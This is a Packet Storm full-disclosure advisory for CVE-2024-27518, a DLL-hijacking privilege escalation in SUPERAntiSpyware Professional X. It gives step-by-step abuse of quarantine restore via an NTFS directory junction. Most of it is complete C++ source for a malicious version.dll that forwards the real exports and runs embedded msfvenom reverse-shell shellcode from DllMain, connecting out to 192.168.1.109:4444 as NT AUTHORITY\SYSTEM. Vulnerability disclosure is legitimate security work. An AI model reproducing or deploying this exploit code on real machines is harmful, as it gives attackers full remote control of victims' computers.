Lucene search
M. Akil GundoganPACKETSTORM:177898
HistoryApr 03, 2024 - 12:00 a.m.
SUPERAntiSpyware Professional X 10.0.1264 DLL Hijacking / Privilege Escalation

2024-04-0300:00:00
M. Akil Gundogan
packetstormsecurity.com
102
superantispyware
professional x
10.0.1264
dll hijacking
privilege escalation
local
vulnerability
version dll
windows 10
ntfs
directory junction
quarantine
sascore64.exe
shellcode
nt authority\system
poc
cve-2024-27518
mitigations
full disclosure
vulnerability reporting
vendor refusal
repository
secunnix
vulnerability research team
dllmain
7.2 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
15.8%
JSON
`# Title: SUPERAntiSpyware Professional X Version <=10.0.1264 "version.dll" Local Privilege Escalation   
# Date: 03.04.2024  
# Author: M. Akil Gündoğan   
# Vendor Homepage: https://superantispyware.com/  
# Version: 10.0.1262 and lastest version 10.0.1264  
# Tested on: Windows 10 Professional x64  
# PoC Video: https://youtu.be/FM5XlZPdvdo  
# CVE ID: CVE-2024-27518  
  
# Vulnerability Description:  
--------------------------------------  
SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the "C:\Program Files\SUPERAntiSpyware" folder via an NTFS directory junction, as demonstrated by a crafted version.dll file that is detected as malware. Since SASCore64.exe has a DLL Hijacking vulnerability for "version.dll", a shell is obtained as NT AUTHORITY\SYSTEM after system reboot.  
  
Technical details and step by step Proof of Concept's (PoC):  
  
1 - A malicious version.dll file containing shellcode is created.  
  
2 - If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware, it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll" to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.  
  
3 - Create a new folder and copy the prepared "version.dll" into it. Then the folder is scanned and SUPERAntiSpyware quarantines the DLL.  
  
4 - Using "CreateMountPoint.exe" among the "Symbolic Link Testing" tools provided by Google, the path where "version.dll" is quarantined is mounted in the "C:\Program Files\SUPERAntiSpyware" directory. These tools are available at the following link (https://github.com/googleprojectzero/symboliclink-testing-tools) or you can use the mklink command to do the same thing.   
  
5 - When the quarantined "version.dll" is restored, it will be copied to SUPERAntiSpyware's directory. After the system reboots, SASCore64.exe will execute the shellcode in "version.dll" and open a session with NT AUTHORITY\SYSTEM privileges for the attacker.  
  
# Mitigations:  
--------------------------------------  
We recommend uninstalling SUPERAntiSpyware until the vulnerability is fixed.   
  
# Timeline:  
--------------------------------------  
- 18.02.2024 - Vulnerability reported via email but vendor refused to fix it.  
- 03.04.2024 - Full disclosure.  
  
# References  
--------------------------------------  
- Vendor: https://www.superantispyware.com/  
- CVE: https://www.cve.org/CVERecord?id=CVE-2024-27518  
- Repository: https://github.com/secunnix/CVE-2024-27518/  
  
# DLLMain:  
-------------------------------------------------------------------------------------------------------------------------  
  
/* SUPERAntiSpyware LPE "version.dll" DLLMain.cpp   
M. Akil GUNDOGAN (0xr3act0r) - Secunnix Vulnerability Research Team  
Special Thanks: Safa Karakus and Samet Gozet  
  
If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware,   
it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll"   
to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.  
  
Compile as release x64 DLL.  
*/  
  
#include "windows.h"  
#include "ios"  
#include "fstream"  
#include <iostream>  
  
#pragma once  
#pragma comment(linker,"/export:GetFileVersionInfoA=c:\\windows\\system32\\version.GetFileVersionInfoA,@1")  
#pragma comment(linker,"/export:GetFileVersionInfoByHandle=c:\\windows\\system32\\version.GetFileVersionInfoByHandle,@2")  
#pragma comment(linker,"/export:GetFileVersionInfoExA=c:\\windows\\system32\\version.GetFileVersionInfoExA,@3")  
#pragma comment(linker,"/export:GetFileVersionInfoExW=c:\\windows\\system32\\version.GetFileVersionInfoExW,@4")  
#pragma comment(linker,"/export:GetFileVersionInfoSizeA=c:\\windows\\system32\\version.GetFileVersionInfoSizeA,@5")  
#pragma comment(linker,"/export:GetFileVersionInfoSizeExA=c:\\windows\\system32\\version.GetFileVersionInfoSizeExA,@6")  
#pragma comment(linker,"/export:GetFileVersionInfoSizeExW=c:\\windows\\system32\\version.GetFileVersionInfoSizeExW,@7")  
#pragma comment(linker,"/export:GetFileVersionInfoSizeW=c:\\windows\\system32\\version.GetFileVersionInfoSizeW,@8")  
#pragma comment(linker,"/export:GetFileVersionInfoW=c:\\windows\\system32\\version.GetFileVersionInfoW,@9")  
#pragma comment(linker,"/export:VerFindFileA=c:\\windows\\system32\\version.VerFindFileA,@10")  
#pragma comment(linker,"/export:VerFindFileW=c:\\windows\\system32\\version.VerFindFileW,@11")  
#pragma comment(linker,"/export:VerInstallFileA=c:\\windows\\system32\\version.VerInstallFileA,@12")  
#pragma comment(linker,"/export:VerInstallFileW=c:\\windows\\system32\\version.VerInstallFileW,@13")  
#pragma comment(linker,"/export:VerLanguageNameA=c:\\windows\\system32\\version.VerLanguageNameA,@14")  
#pragma comment(linker,"/export:VerLanguageNameW=c:\\windows\\system32\\version.VerLanguageNameW,@15")  
#pragma comment(linker,"/export:VerQueryValueA=c:\\windows\\system32\\version.VerQueryValueA,@16")  
#pragma comment(linker,"/export:VerQueryValueW=c:\\windows\\system32\\version.VerQueryValueW,@17")  
  
// Shellcode: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f c  
unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"  
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"  
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"  
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"  
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"  
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"  
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"  
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"  
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"  
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"  
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"  
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"  
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"  
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"  
"\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"  
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00"  
"\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x6d"  
"\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"  
"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29"  
"\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48"  
"\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea"  
"\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"  
"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81"  
"\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"  
"\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0"  
"\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"  
"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41"  
"\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d"  
"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48"  
"\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"  
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5"  
"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"  
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";  
  
  
VOID shellcodeExecute() {  
ShowWindow(GetConsoleWindow(), SW_HIDE);  
  
HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);  
  
void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(shellcode));  
  
std::memcpy(mem_map, shellcode, sizeof(shellcode));  
  
std::cout << ((int(*)())mem_map)() << std::endl;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)  
{  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
shellcodeExecute();  
break;  
case DLL_THREAD_ATTACH:  
break;  
case DLL_THREAD_DETACH:  
break;  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
`